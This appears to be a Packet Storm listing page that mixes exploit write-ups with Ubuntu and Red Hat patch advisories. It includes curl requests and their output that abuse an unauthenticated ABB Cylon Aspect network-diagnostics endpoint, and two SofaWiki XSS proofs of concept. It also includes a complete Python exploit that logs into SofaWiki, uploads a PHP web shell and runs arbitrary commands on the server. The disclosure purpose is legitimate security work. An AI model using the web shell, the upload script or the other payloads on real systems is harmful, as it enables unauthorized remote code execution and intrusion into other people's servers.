ABB Cylon Aspect version 3.08.01 allows an unauthenticated attacker to perform network operations such as ping, traceroute, or nslookup on arbitrary hosts or IPs by sending a crafted GET request to networkDiagAjax.php. This could be exploited to interact with or probe internal or external systems, leading to internal information disclosure and misuse of network resources.

    ABB Cylon Aspect 3.08.01 (networkDiagAjax.php) Remote Network Utility ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The vulnerability allows an unauthenticated attacker to perform networkoperations such as ping, traceroute, or nslookup on arbitrary hosts or IPs bysending a crafted GET request to networkDiagAjax.php. This could be exploitedto interact with or probe internal or external systems, leading to internalinformation disclosure and misuse of network resources.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5844Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5844.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl "http://192.168.73.31/networkDiagAjax.php?command=nslookup&host=packetstormsecurity.org"<div>Server:    8.8.8.8<br>Address 1: 8.8.8.8 dns.google<br><br>Name:      packetstormsecurity.org<br>Address 1: 198.84.60.198 198-84-60-198.ash01.rokabear.com<br></div>$ curl "http://192.168.73.31/networkDiagAjax.php?command=ping&host=1.1.1.1"<div>PING 1.1.1.1 (1.1.1.1): 56 data bytes<br>64 bytes from 1.1.1.1: seq=0 ttl=53 time=61.176 ms<br>64 bytes from 1.1.1.1: seq=1 ttl=53 time=60.986 ms<br>64 bytes from 1.1.1.1: seq=2 ttl=53 time=100.660 ms<br><br>--- 1.1.1.1 ping statistics ---<br>3 packets transmitted, 3 packets received, 0% packet loss<br>round-trip min/avg/max = 60.986/74.274/100.660 ms<br></div>$ curl "http://192.168.73.31/networkDiagAjax.php?command=traceroute&host=127.0.0.1"<div>traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 38 byte packets<br> 1  localhost.localdomain (127.0.0.1)  0.019 ms  0.010 ms  0.009 ms<br></div>

ABB Cylon Aspect 3.08.01 networkDiagAjax.php Remote Network Utility Execution

SofaWiki version 3.9.2 suffers from a reflective cross site scripting vulnerability.

    # Exploit Title: SofaWiki 3.9.2 - Reflected XSS (Authenticated) via RegexReplace Preview# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XP*Summary:*A *reflected XSS* vulnerability exists in the *Regex Replace Preview*feature of SofaWiki. When a malicious payload is injected into the *Replace*field, the payload is executed immediately in the user’s browser during thepreview. Proof of Concept (PoC):1. Login to SofaWiki.2. Go to Special => Regex :http://localhost/sofawiki/index.php?action=view&name=special:regex&lang=en3. In the Regex field, enter any text (e.g., test).4. In the Replace field, inject the following payload:<script>alert('XSS');</script>5. Click Replace Preview to trigger the XSS.

SofaWiki 3.9.2 Cross Site Scripting

Ubuntu Security Notice 7073-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7073-1October 16, 2024linux, linux-aws, linux-aws-5.4, linux-bluefield, linux-gcp,linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4,linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi, linux-raspi-5.4,linux-xilinx-zynqmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Watchdog drivers;  - Netfilter;  - Memory management;  - Network traffic control;(CVE-2024-27397, CVE-2024-38630, CVE-2024-45016, CVE-2024-26960)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1053-xilinx-zynqmp  5.4.0-1053.57  linux-image-5.4.0-1081-ibm      5.4.0-1081.86  linux-image-5.4.0-1094-bluefield  5.4.0-1094.101  linux-image-5.4.0-1101-gkeop    5.4.0-1101.105  linux-image-5.4.0-1118-raspi    5.4.0-1118.130  linux-image-5.4.0-1122-kvm      5.4.0-1122.130  linux-image-5.4.0-1133-oracle   5.4.0-1133.142  linux-image-5.4.0-1134-aws      5.4.0-1134.144  linux-image-5.4.0-1138-gcp      5.4.0-1138.147  linux-image-5.4.0-198-generic   5.4.0-198.218  linux-image-5.4.0-198-generic-lpae  5.4.0-198.218  linux-image-5.4.0-198-lowlatency  5.4.0-198.218  linux-image-aws-lts-20.04       5.4.0.1134.131  linux-image-bluefield           5.4.0.1094.90  linux-image-gcp-lts-20.04       5.4.0.1138.140  linux-image-generic             5.4.0.198.196  linux-image-generic-lpae        5.4.0.198.196  linux-image-gkeop               5.4.0.1101.99  linux-image-gkeop-5.4           5.4.0.1101.99  linux-image-ibm-lts-20.04       5.4.0.1081.110  linux-image-kvm                 5.4.0.1122.118  linux-image-lowlatency          5.4.0.198.196  linux-image-oem                 5.4.0.198.196  linux-image-oem-osp1            5.4.0.198.196  linux-image-oracle-lts-20.04    5.4.0.1133.126  linux-image-raspi               5.4.0.1118.148  linux-image-raspi2              5.4.0.1118.148  linux-image-virtual             5.4.0.198.196  linux-image-xilinx-zynqmp       5.4.0.1053.53Ubuntu 18.04 LTS  linux-image-5.4.0-1081-ibm      5.4.0-1081.86~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1118-raspi    5.4.0-1118.130~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1133-oracle   5.4.0-1133.142~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1134-aws      5.4.0-1134.144~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1138-gcp      5.4.0-1138.147~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-198-generic   5.4.0-198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-198-lowlatency  5.4.0-198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-aws                 5.4.0.1134.144~18.04.1                                  Available with Ubuntu Pro  linux-image-gcp                 5.4.0.1138.147~18.04.1                                  Available with Ubuntu Pro  linux-image-generic-hwe-18.04   5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-ibm                 5.4.0.1081.86~18.04.1                                  Available with Ubuntu Pro  linux-image-lowlatency-hwe-18.04  5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-oem                 5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-oem-osp1            5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-oracle              5.4.0.1133.142~18.04.1                                  Available with Ubuntu Pro  linux-image-raspi-hwe-18.04     5.4.0.1118.130~18.04.1                                  Available with Ubuntu Pro  linux-image-snapdragon-hwe-18.04  5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-virtual-hwe-18.04   5.4.0.198.218~18.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7073-1  CVE-2024-26960, CVE-2024-27397, CVE-2024-38630, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux/5.4.0-198.218  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1134.144  https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1094.101  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1138.147  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1101.105  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1081.86  https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1122.130  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1133.142  https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1118.130  https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1053.57

Ubuntu Security Notice USN-7073-1

Red Hat Security Advisory 2024-8180-03 - An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.4 Extended Update Support. Issues addressed include code execution, out of bounds read, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8180.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: webkit2gtk3 security update  
Advisory ID:        RHSA-2024:8180-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8180  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2024-23271  
====================================================================

Summary: 

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.

Security Fix(es):

* webkitgtk: webkit2gtk: Use after free may lead to Remote Code Execution (CVE-2024-40776)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-40789)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40780)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40779)

* webkitgtk: webkit2gtk: Use-after-free was addressed with improved memory management (CVE-2024-40782)

* webkitgtk: Visiting a malicious website may lead to address bar spoofing (CVE-2024-40866)

* webkitgtk: A malicious website may cause unexpected cross-origin behavior (CVE-2024-23271)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-27820)

* webkitgtk: A maliciously crafted webpage may be able to fingerprint the user (CVE-2024-27838)

* webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2024-27851)

* webkitgtk: A malicious website may exfiltrate data cross-origin (CVE-2024-44187)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-23271

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2301841  
https://bugzilla.redhat.com/show_bug.cgi?id=2302067  
https://bugzilla.redhat.com/show_bug.cgi?id=2302069  
https://bugzilla.redhat.com/show_bug.cgi?id=2302070  
https://bugzilla.redhat.com/show_bug.cgi?id=2302071  
https://bugzilla.redhat.com/show_bug.cgi?id=2312724  
https://bugzilla.redhat.com/show_bug.cgi?id=2314696  
https://bugzilla.redhat.com/show_bug.cgi?id=2314698  
https://bugzilla.redhat.com/show_bug.cgi?id=2314702  
https://bugzilla.redhat.com/show_bug.cgi?id=2314704  
https://bugzilla.redhat.com/show_bug.cgi?id=2314706

Red Hat Security Advisory 2024-8180-03

Red Hat Security Advisory 2024-8179-03 - An update for resource-agents is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8179.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: resource-agents security updateAdvisory ID:        RHSA-2024:8179-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8179Issue date:         2024-10-16Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for resource-agents is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The resource-agents packages provide the Pacemaker and RGManager service managers with a set of scripts. These scripts interface with several services to allow operating in a high-availability (HA) environment.Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-8179-03

Red Hat Security Advisory 2024-8129-03 - An update is now available for OpenJDK. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8129.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenJDK 21.0.5 Security Update for Windows Builds  
Advisory ID:        RHSA-2024:8129-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8129  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 21 (21.0.5) for Windows serves as a replacement for the Red Hat build of OpenJDK 21 (21.0.4) and includes security and bug fixes. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function (CVE-2023-48161)

* OpenJDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* OpenJDK: HTTP client improper handling of maxHeaderSize (8328286) (CVE-2024-21208)

* OpenJDK: Unbounded allocation leads to out-of-memory error (8331446) (CVE-2024-21217)

* OpenJDK:  Integer conversion error leads to incorrect range check (8332644) (CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8129-03

Red Hat Security Advisory 2024-8128-03 - An update is now available for OpenJDK. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8128.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenJDK 21.0.5 Security Update for Portable Linux Builds  
Advisory ID:        RHSA-2024:8128-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8128  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 21 (21.0.5) for portable Linux serves as a replacement for the Red Hat build of OpenJDK 21 (21.0.4) and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function  
(CVE-2023-48161)

* OpenJDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* OpenJDK: HTTP client improper handling of maxHeaderSize (8328286)  
(CVE-2024-21208)

* OpenJDK: Unbounded allocation leads to out-of-memory error (8331446)  
(CVE-2024-21217)

* OpenJDK:  Integer conversion error leads to incorrect range check (8332644)  
(CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8128-03

SofaWiki version 3.9.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: SofaWiki 3.9.2 - Stored XSS (Authenticated)# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XPSummary:A stored XSS exists in SofaWiki's Open Ticket feature. An authenticateduser can inject a JavaScript payload into the ticket's title field, whichtriggers whenever the ticket is viewed.Proof of Concept (PoC):1. Login and go to New Ticket:http://localhost/sofawiki/index.php?name=special:tickets&ticketaction=new2. Use this payload in the Title field:<script>alert('XSS');</script>3. Click Open Ticket the alert will be triggered.The payload runs each time the ticket is opened.

Red Hat Security Advisory 2024-8127-03 - An update for java-21-openjdk is now available for Red Hat Enterprise Linux 8 and Red Hat Enterprise Linux 9. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8127.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: java-21-openjdk security update  
Advisory ID:        RHSA-2024:8127-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8127  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update for java-21-openjdk is now available for Red Hat Enterprise Linux 8 and Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 runtime environment.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function (CVE-2023-48161)

* JDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* JDK: HTTP client improper handling of maxHeaderSize (8328286) (CVE-2024-21208)

* JDK: Unbounded allocation leads to out-of-memory error (8331446) (CVE-2024-21217)

* JDK: Integer conversion error leads to incorrect range check (8332644) (CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8127-03

SofaWiki version 3.9.2 suffers from a remote shell upload vulnerability.

    # Exploit Title: SofaWiki 3.9.2 - Remote Code Execution (RCE) via Open Ticket File Upload# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XPSummary:A remote code execution (RCE) vulnerability exists in the Open Ticketfeature of SofaWiki 3.9.2. An attacker can upload a malicious `.phar` filethat contains PHP code, bypassing `.htaccess` restrictions, and executearbitrary commands on the server.Exploit Steps:1. Login to SofaWiki.2. Navigate to Special → Tickets → New Ticket:http://localhost/sofawiki/index.php?name=special:tickets&ticketaction=new3. Select your shell.phar file with this content:   <?php system($_GET['cmd']); ?>4. Fill in the ticket title and click Open Ticket.5. After the ticket is created, the page shows a link to the uploadedshell.phar6. access the webshell:http://localhost/sofawiki/site/files/ticket-1-shell.phar?cmd=whoami--------------# Exploit Title: SofaWiki 3.9.2 - RCE (authenticated) via Open Ticket File Upload  Exploit# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XPimport requestsimport reimport sysclass SofaWikiExploit:    def __init__(self, base_url, username, password):        self.base_url = base_url.rstrip('/')        self.username = username        self.password = password        self.session = requests.Session()    def detect_login_name(self):        response =self.session.get(f"{self.base_url}/index.php?action=login")        match = re.search(r'name="name" value="([^"]+)"', response.text)        if not match:            print("\033[91m\033[1m[-] couldn't find the 'name' field.Exiting.\033[0m")            sys.exit(1)        return match.group(1)    def login(self):        print("\033[93m[*] logging in...\033[0m")        login_name = self.detect_login_name()        data = {            "submitlogin": "Login",            "username": self.username,            "pass": self.password,            "name": login_name,            "action": "login"        }        response = self.session.post(f"{self.base_url}/index.php",data=data)        if "Logout" in response.text:            print("\033[92m\033[1m[+] Login successful!\033[0m")            return True        print("\033[91m[-] login failed.\033[0m")        return False    def upload_shell(self):        print("\033[93m[*] uploading shell...\033[0m")        shell_content = '<?php system($_GET["cmd"]); ?>'        files = {            'uploadedfile': ('shell.phar', shell_content,'application/octet-stream'),            'title': (None, 'Chokri Hammedi Exploit'),            'text': (None, 'Chokri Hammedi RCE'),            'assigned': (None, 'admin'),            'priority': (None, '1 high'),            'submitopen': (None, 'Open Ticket'),            'MAX_FILE_SIZE': (None, '8000000')        }        response =self.session.post(f"{self.base_url}/index.php?name=special:tickets",files=files)        match = re.search(r'File (.*?) uploaded', response.text)        if not match:            print("\033[91m[-] shell upload failed.\033[0m")            sys.exit(1)        shell_url = f"{self.base_url}/site/files/{match.group(1)}"        print(f"\033[92m[+] shell uploaded: {shell_url}\033[0m")        return shell_url    def execute_command(self, shell_url, cmd):        print(f"\033[93m[*] running command: {cmd}\033[0m")        response = self.session.get(f"{shell_url}?cmd={cmd}")        print("\033[92m[+] command output:\033[0m")        print(f"\033[1m{response.text}\033[0m")if __name__ == "__main__":    if len(sys.argv) != 5:        print(f"\033[91musage: {sys.argv[0]} <target_url> <username><password> <cmd>\033[0m")        sys.exit(1)    target_url, username, password, cmd = sys.argv[1:5]    exploit = SofaWikiExploit(target_url, username, password)    if exploit.login():        shell_url = exploit.upload_shell()        exploit.execute_command(shell_url, cmd)

Source

Packet Storm